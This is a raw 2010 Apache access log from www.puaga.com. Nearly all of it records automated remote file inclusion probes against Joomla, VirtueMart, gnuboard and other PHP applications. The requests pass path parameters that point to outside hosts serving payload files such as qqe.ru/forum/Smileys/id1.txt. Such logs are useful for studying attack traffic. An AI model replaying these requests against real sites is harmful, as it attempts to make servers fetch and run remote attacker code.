58.150.99.144 - - [15/Feb/2010:06:47:19 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:06:47:31 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:06:47:31 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:06:47:31 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infotecknet.com.br/site/id??? HTTP/1.0" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:06:49:42 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:06:49:42 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:06:49:42 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:06:49:52 -0800] "GET /logs/access_100111.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:06:50:06 -0800] "GET /logs/access_100116.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:06:50:07 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:06:50:07 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:50:17 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:50:17 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:50:17 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [15/Feb/2010:06:51:30 -0800] "GET /phphtml.php?htmlclass_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [15/Feb/2010:06:51:30 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [15/Feb/2010:06:51:30 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [15/Feb/2010:06:51:30 -0800] "GET /phphtml.php?htmlclass_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [15/Feb/2010:06:51:54 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [15/Feb/2010:06:51:54 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:51:55 -0800] "GET /logs/access_100115.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:51:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:51:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:52:01 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:52:01 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:52:05 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:06:52:28 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:06:53:28 -0800] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:06:53:28 -0800] "GET /logs///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:06:53:28 -0800] "GET /logs/access_100130.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [15/Feb/2010:06:53:39 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [15/Feb/2010:06:54:24 -0800] "GET /logs/access_100109.log%20%20/phphtml.php?htmlclass_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:54:46 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:56:20 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:56:20 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:56:20 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:56:20 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:56:21 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:56:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:56:41 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:56:41 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:56:46 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.46.124 - - [15/Feb/2010:06:57:05 -0800] "GET /logs/access_100116.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
221.143.46.124 - - [15/Feb/2010:06:57:06 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
221.143.46.124 - - [15/Feb/2010:06:57:06 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:06:57:39 -0800] "GET /logs/access_100203.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:06:57:39 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:06:57:39 -0800] "GET /logs/access_100202.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:06:57:39 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:06:57:49 -0800] "GET /logs/access_100111.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.164 - - [15/Feb/2010:06:57:56 -0800] "GET /logs/access_100206.log///assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:58:24 -0800] "GET /logs/access_100202.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:58:24 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:58:24 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [15/Feb/2010:06:58:29 -0800] "GET /logs/access_100205.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.47.80.36 - - [15/Feb/2010:06:58:32 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.puaga.com"
193.47.80.36 - - [15/Feb/2010:06:58:32 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:06:59:11 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:59:27 -0800] "GET //gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:59:27 -0800] "GET /logs/access_100201.log%20%20///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:06:59:27 -0800] "GET /logs///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:59:38 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:59:38 -0800] "GET /logs/access_100111.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:59:38 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:59:43 -0800] "GET /logs/access_100125.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:59:44 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:59:44 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:59:45 -0800] "GET /logs/access_100111.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:06:59:53 -0800] "GET /logs/access_100125.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [15/Feb/2010:07:00:00 -0800] "GET /logs/access_100116.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [15/Feb/2010:07:00:01 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [15/Feb/2010:07:00:01 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=%22http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:07:00:07 -0800] "GET /logs/access_100130.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:07:00:11 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:07:00:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:07:00:40 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:07:00:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:07:00:47 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:07:01:30 -0800] "GET /logs/access_100203.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [15/Feb/2010:07:01:32 -0800] "GET /logs/access_100203.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [15/Feb/2010:07:01:52 -0800] "GET /logs/access_100109.log/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:01:54 -0800] "GET /logs/access_100131.log//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:02:19 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:02:19 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:02:19 -0800] "GET /logs/access_100116.log//modules/vwar/admin/admin.php?vwar_root=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:02:24 -0800] "GET //gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:02:24 -0800] "GET /logs/access_100201.log%20%20///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:02:24 -0800] "GET /logs///gbd/skin/board/Miso_bbs/setup.php//gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:02:34 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:02:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:02:39 -0800] "GET /logs/access_100116.log//modules/vwar/admin/admin.php?vwar_root=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:07:03:35 -0800] "GET /logs/access_100115.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:07:03:35 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [15/Feb/2010:07:04:10 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:07:04:11 -0800] "GET /logs///index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
213.239.230.130 - - [15/Feb/2010:07:04:11 -0800] "GET //index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.solutionexchange-un.net.in/en//media/test.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:04:16 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [15/Feb/2010:07:04:17 -0800] "GET /logs/access_100111.log/components/com_performs/performs.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:07:04:22 -0800] "GET /bbs//skin/ggambo7002_board//comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:07:04:22 -0800] "GET /logs//bbs//skin/ggambo7002_board//comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:07:04:22 -0800] "GET /logs/access_100111.log//bbs//skin/ggambo7002_board//comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:07:04:28 -0800] "GET /logs//bbs//skin/ggambo7002_board//comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:07:04:28 -0800] "GET /bbs//skin/ggambo7002_board//comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [15/Feb/2010:07:04:28 -0800] "GET /logs/access_100111.log//bbs//skin/ggambo7002_board//comment_modify.php?dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:05:11 -0800] "GET /logs/access_100111.log//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [15/Feb/2010:07:05:16 -0800] "GET /errors.php?error=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
74.205.120.218 - - [15/Feb/2010:07:05:17 -0800] "GET /logs/access_100125.log//modules/TotalCalendar/about.php?inc_dir=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:05:27 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:05:27 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:07:05:27 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
